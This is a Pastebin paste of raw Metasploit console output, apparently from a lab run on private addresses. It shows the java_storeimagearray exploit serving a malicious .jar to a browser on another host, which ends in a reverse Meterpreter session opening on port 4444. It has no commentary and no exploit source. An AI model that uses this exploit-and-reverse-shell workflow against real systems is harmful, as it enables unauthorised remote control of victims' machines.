Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(java_storeimagearray) > run
- [*] Exploit running as background job.
- [*] Started reverse handler on 10.0.1.76:4444
- [*] Using URL: http://0.0.0.0:8080/vMKJ2Jtxsh1Jj0e
- [*] Local IP: http://10.0.1.76:8080/vMKJ2Jtxsh1Jj0e
- [*] Server started.
- msf exploit(java_storeimagearray) > [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e
- [*] 10.0.1.78 java_storeimagearray - Sending redirect...
- [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/
- [*] 10.0.1.78 java_storeimagearray - Sending HTML...
- [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/Itfnu.jar
- [*] 10.0.1.78 java_storeimagearray - Sending .jar file...
- [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/Itfnu.jar
- [*] 10.0.1.78 java_storeimagearray - Sending .jar file...
- [*] Sending stage (30355 bytes) to 10.0.1.78
- [*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.78:2370) at 2013-08-16 01:28:20 -0500
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement